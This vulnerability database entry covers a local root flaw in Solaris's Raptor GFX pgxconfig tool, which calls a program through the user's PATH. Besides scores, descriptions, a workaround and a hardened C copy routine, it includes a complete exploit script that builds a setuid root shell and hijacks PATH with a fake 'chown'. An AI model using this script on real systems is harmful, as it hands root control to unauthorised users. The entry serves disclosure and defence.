Published: 2000-10-20 00:00:00
Revised: 2008-09-05 16:21:39

[Original] pgxconfig in the Raptor GFX configuration tool uses a relative path name for a system call to the "cp" program, which allows local users to execute arbitrary commands by modifying their path to point to an alternate "cp" program.

[CNNVD] Raptor GFX pgxconfig Command Execution Vulnerability (CNNVD-200010-051)

        pgxconfig in the Raptor GFX configuration tool invokes the system "cp" program by a relative path name; a local user can exploit this by modifying their path so that it points to a substitute "cp" program, and thereby execute arbitrary commands.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be fully compromised]
Availability impact: COMPLETE [may result in complete system shutdown]
Access complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(official data source) MITRE
(official data source) NVD
(official data source) CNNVD

- Other links and resources
(VENDOR_ADVISORY)  BUGTRAQ  20000802 Local root compromise in PGX Config Sun Sparc Solaris

- Vulnerability information

Raptor GFX pgxconfig Command Execution Vulnerability
Severity: High    Type: Unknown
2000-10-20 00:00:00    2005-10-12 00:00:00

- Advisories and patches


- Vulnerability information (20147)

Tech-Source Raptor GFX PGX32 2.3.1 Config Tool Vulnerability (EDBID:20147)
solaris local
2000-08-02 Verified
0 suid

Raptor GFX cards are designed to handle 24-bit true color applications such as Netscape, seismic, geographical information systems (GIS), satellite imaging, pre-press imaging and general desktop use. They can also be used for high resolution 8-bit applications such as Insignia's SoftWindows, medical imaging and many legacy applications.

Certain versions of the software shipped to configure the Raptor GFX cards are vulnerable to a PATH environment variable attack due to insecure code within pgxconfig, the main configuration utility. In particular, pgxconfig uses an insecure library call, system(3S). This function executes binaries resident on the system from within the program. Because it must locate those binaries, it relies on the $PATH variable to tell it where the system binaries reside. This variable is configurable by the user, so a user can supply their own binary to be executed. In this case, because the program also issues a setuid(0) call (which sets the UID of the process, here to root), the binary the user substitutes is executed as root.
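As an added illustration (not code from the advisory, and not pgxconfig's own source), the C below places the system("cp ...") pattern described above next to a hardened replacement that runs the copy program by absolute path, with a fixed environment and no shell. The /bin/cp location and the /tmp sample paths are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define SAMPLE "pgxconfig demo: constructed sample data\n"  /* constructed content */

/* The pattern the advisory describes: a privileged program hands a bare
 * command name to system(), so /bin/sh resolves "cp" through whatever
 * PATH the invoking user supplied. Kept only to contrast with the fix. */
int relative_copy(const char *src, const char *dst) {
    char cmd[1024];
    snprintf(cmd, sizeof cmd, "cp %s %s", src, dst);
    int st = system(cmd);
    return (st != -1 && WIFEXITED(st) && WEXITSTATUS(st) == 0) ? 0 : -1;
}

/* Hardened form: no shell, absolute program path, a fixed minimal
 * environment, and arguments passed as a vector instead of a string. */
int hardened_copy(const char *src, const char *dst) {
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    char *const argv[] = { "cp", "--", (char *)src, (char *)dst, NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                       /* child: exec /bin/cp or fail */
        execve("/bin/cp", argv, envp);
        _exit(127);
    }
    int st;
    if (waitpid(pid, &st, 0) < 0) return -1;
    return (WIFEXITED(st) && WEXITSTATUS(st) == 0) ? 0 : -1;
}

/* Demo helpers: create the constructed sample file and verify a copy. */
int write_sample(const char *path) {
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    int ok = fputs(SAMPLE, f) >= 0;
    return (fclose(f) == 0 && ok) ? 0 : -1;
}
int copy_matches(const char *path) {
    char buf[256] = {0};
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    return n == strlen(SAMPLE) && memcmp(buf, SAMPLE, n) == 0;
}
```

With PATH set to a directory that contains no cp, relative_copy fails while hardened_copy still succeeds, which is the property the workaround of dropping the SUID bit only approximates.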


        # TechSource Raptor GFX configurator root exploit

        # unfortunately a compiler must be installed to use this example
        # exploit. however there's a million ways around this you know
        # on my system , gcc isnt in my path

        # build a little prog nothing new here folks
        echo '#include<stdio.h>' > ./x.c
        echo 'int main(void) { setuid(0); setgid(0); execl("/bin/sh", "/bin/sh", "-i",0);}' >> ./x.c
        gcc x.c -o foobar
        rm -f ./x.c

        # build a substitute chown command. i much prefer this over
        # regular chown
        echo "#!/bin/sh" > chown
        echo "/usr/bin/chown root ./foobar" >> chown
        echo "/usr/bin/chmod 4755 ./foobar" >> chown
        chmod 0755 chown

        # oooh look its the magical fairy path variable
        export PATH=.:$PATH
        # heres one way to skin a cat
        # (theres more, some need valid devices. excercise for the readers)
        /usr/sbin/pgxconfig -i
        rm -f chown



- Vulnerability information

Raptor GFX pgxconfig Path Subversion Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- Vulnerability description

Raptor GFX contains a flaw that may allow a local attacker to gain root privileges. The issue is due to a flaw in the "pgxconfig" utility that allows an attacker to specify an arbitrary path to the "cp" program. If an attacker puts a specially crafted program in its place, that program will be called, allowing execution of arbitrary commands with root privileges.

- Timeline

2000-08-02 Unknown
2000-08-02 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: change the permissions on pgxconfig to remove the SUID bit.

- References

- Vulnerability author